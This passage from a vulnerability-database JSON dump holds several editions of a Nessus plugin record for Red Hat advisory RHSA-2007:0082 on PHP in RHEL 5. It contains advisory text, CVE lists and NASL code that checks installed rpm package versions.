flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-devel / etc\");\n }\n}\n", "title": "RHEL 5 : php (RHSA-2007:0082)", "type": "nessus", "viewCount": 4}, "differentElements": ["cpe"], "edition": 2, "lastseen": "2016-12-30T02:13:20"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:redhat:enterprise_linux:php-devel", "p-cpe:/a:redhat:enterprise_linux:php-pgsql", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:php-xml", "p-cpe:/a:redhat:enterprise_linux:php-ldap", "p-cpe:/a:redhat:enterprise_linux:php-soap", "p-cpe:/a:redhat:enterprise_linux:php-common", "p-cpe:/a:redhat:enterprise_linux:php-mbstring", "p-cpe:/a:redhat:enterprise_linux:php-odbc", "p-cpe:/a:redhat:enterprise_linux:php-imap", "p-cpe:/a:redhat:enterprise_linux:php-xmlrpc", "p-cpe:/a:redhat:enterprise_linux:php-mysql", "p-cpe:/a:redhat:enterprise_linux:php-snmp", "p-cpe:/a:redhat:enterprise_linux:php-pdo", "p-cpe:/a:redhat:enterprise_linux:php-ncurses", "p-cpe:/a:redhat:enterprise_linux:php", "p-cpe:/a:redhat:enterprise_linux:php-cli", "p-cpe:/a:redhat:enterprise_linux:php-dba", "p-cpe:/a:redhat:enterprise_linux:php-bcmath", "p-cpe:/a:redhat:enterprise_linux:php-gd"], "cvelist": ["CVE-2007-1701", "CVE-2007-0907", "CVE-2007-1285", "CVE-2007-0909", "CVE-2007-1825", "CVE-2007-0910", "CVE-2007-0988", "CVE-2007-1380", "CVE-2007-0906", "CVE-2007-0908"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Updated PHP packages that fix several security issues are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session extension; the str_replace() function; and the imap_mail_compose() function. If very long strings were passed to the str_replace() function, an integer overflow could occur in memory allocation. If a script used the imap_mail_compose() function to create a new MIME message based on an input body from an untrusted source, it could result in a heap overflow. An attacker with access to a PHP application affected by any these issues could trigger the flaws and possibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\n\nWhen unserializing untrusted data on 64-bit platforms, the zend_hash_init() function could be forced into an infinite loop, consuming CPU resources for a limited time, until the script timeout alarm aborted execution of the script. (CVE-2007-0988)\n\nIf the wddx extension was used to import WDDX data from an untrusted source, certain WDDX input packets could expose a random portion of heap memory. (CVE-2007-0908)\n\nIf the odbc_result_all() function was used to display data from a database, and the database table contents were under an attacker's control, a format string vulnerability was possible which could allow arbitrary code execution. (CVE-2007-0909)\n\nA one byte memory read always occurs before the beginning of a buffer.\nThis could be triggered, for example, by any use of the header() function in a script. However it is unlikely that this would have any effect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allow attackers to 'clobber' certain super-global variables via unspecified vectors. (CVE-2007-0910)\n\nAn input validation bug allowed a remote attacker to trigger a denial of service attack by submitting an input variable with a deeply-nested-array. (CVE-2007-1285)\n\nUsers of PHP should upgrade to these updated packages which contain backported patches to correct these issues.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "e4512ea2db91293dc4a02f11bad3210484deb0912ba36af0d62e42e3bd18f29f", "hashmap": [{"hash": "141eb5e5e7f7efcaf70f35531014315a", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "42a29e0c952ea4d93d5908b4afdfab89", "key": "sourceData"}, {"hash": "5ed89809cd59db22c6c4bc5e691596fe", "key": "cvelist"}, {"hash": "2ab893896877901f3ca480db3bed6e02", "key": "references"}, {"hash": "851dbb0f33630b51c53f0d6ca1a06fc3", "key": "modified"}, {"hash": "ddc199dc1dacc50b088328ca4eddaf1b", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "c986b43752781caa839decc2a0741192", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "4b44f6da67fcb87f1db557fc9f19e20c", "key": "href"}, {"hash": "235ef73aacd3c98bd8a26e36742ff4ae", "key": "cpe"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}, {"hash": "2e53e2231fd68fdc02c53c3b32b818ad", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=25317", "id": "REDHAT-RHSA-2007-0082.NASL", "lastseen": "2018-08-30T19:30:19", "modified": "2016-12-29T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "25317", "published": "2007-05-25T00:00:00", "references": ["https://www.redhat.com/security/data/cve/CVE-2007-0907.html", "https://www.redhat.com/security/data/cve/CVE-2007-1825.html", "https://www.redhat.com/security/data/cve/CVE-2007-0910.html", "https://www.redhat.com/security/data/cve/CVE-2007-0988.html", "https://www.redhat.com/security/data/cve/CVE-2007-1380.html", "https://www.redhat.com/security/data/cve/CVE-2007-0906.html", "https://www.redhat.com/security/data/cve/CVE-2007-0908.html", "https://www.redhat.com/security/data/cve/CVE-2007-1285.html", "https://www.redhat.com/security/data/cve/CVE-2007-1701.html", "https://www.redhat.com/security/data/cve/CVE-2007-0909.html", "http://rhn.redhat.com/errata/RHSA-2007-0082.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0082. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25317);\n script_version (\"$Revision: 1.18 $\");\n script_cvs_date(\"$Date: 2016/12/29 15:35:20 $\");\n\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\", \"CVE-2007-1285\", \"CVE-2007-1380\", \"CVE-2007-1701\", \"CVE-2007-1825\");\n script_bugtraq_id(22496, 22764);\n script_xref(name:\"RHSA\", value:\"2007:0082\");\n\n script_name(english:\"RHEL 5 : php (RHSA-2007:0082)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session\nextension; the str_replace() function; and the imap_mail_compose()\nfunction. If very long strings were passed to the str_replace()\nfunction, an integer overflow could occur in memory allocation. If a\nscript used the imap_mail_compose() function to create a new MIME\nmessage based on an input body from an untrusted source, it could\nresult in a heap overflow. An attacker with access to a PHP\napplication affected by any these issues could trigger the flaws and\npossibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\n\nWhen unserializing untrusted data on 64-bit platforms, the\nzend_hash_init() function could be forced into an infinite loop,\nconsuming CPU resources for a limited time, until the script timeout\nalarm aborted execution of the script. (CVE-2007-0988)\n\nIf the wddx extension was used to import WDDX data from an untrusted\nsource, certain WDDX input packets could expose a random portion of\nheap memory. (CVE-2007-0908)\n\nIf the odbc_result_all() function was used to display data from a\ndatabase, and the database table contents were under an attacker's\ncontrol, a format string vulnerability was possible which could allow\narbitrary code execution. (CVE-2007-0909)\n\nA one byte memory read always occurs before the beginning of a buffer.\nThis could be triggered, for example, by any use of the header()\nfunction in a script. However it is unlikely that this would have any\neffect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allow attackers to 'clobber' certain\nsuper-global variables via unspecified vectors. (CVE-2007-0910)\n\nAn input validation bug allowed a remote attacker to trigger a denial\nof service attack by submitting an input variable with a\ndeeply-nested-array. (CVE-2007-1285)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0906.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0907.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0908.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0909.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0910.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0988.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-1285.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-1380.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-1701.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-1825.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2007-0082.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/05/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0082\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-devel / etc\");\n }\n}\n", "title": "RHEL 5 : php (RHSA-2007:0082)", "type": "nessus", "viewCount": 4}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:30:19"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:redhat:enterprise_linux:php-devel", "p-cpe:/a:redhat:enterprise_linux:php-pgsql", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:php-xml", "p-cpe:/a:redhat:enterprise_linux:php-ldap", "p-cpe:/a:redhat:enterprise_linux:php-soap", "p-cpe:/a:redhat:enterprise_linux:php-common", "p-cpe:/a:redhat:enterprise_linux:php-mbstring", "p-cpe:/a:redhat:enterprise_linux:php-odbc", "p-cpe:/a:redhat:enterprise_linux:php-imap", "p-cpe:/a:redhat:enterprise_linux:php-xmlrpc", "p-cpe:/a:redhat:enterprise_linux:php-mysql", "p-cpe:/a:redhat:enterprise_linux:php-snmp", "p-cpe:/a:redhat:enterprise_linux:php-pdo", "p-cpe:/a:redhat:enterprise_linux:php-ncurses", "p-cpe:/a:redhat:enterprise_linux:php", "p-cpe:/a:redhat:enterprise_linux:php-cli", "p-cpe:/a:redhat:enterprise_linux:php-dba", "p-cpe:/a:redhat:enterprise_linux:php-bcmath", "p-cpe:/a:redhat:enterprise_linux:php-gd"], "cvelist": ["CVE-2007-1701", "CVE-2007-0907", "CVE-2007-1285", "CVE-2007-0909", "CVE-2007-1825", "CVE-2007-0910", "CVE-2007-0988", "CVE-2007-1380", "CVE-2007-0906", 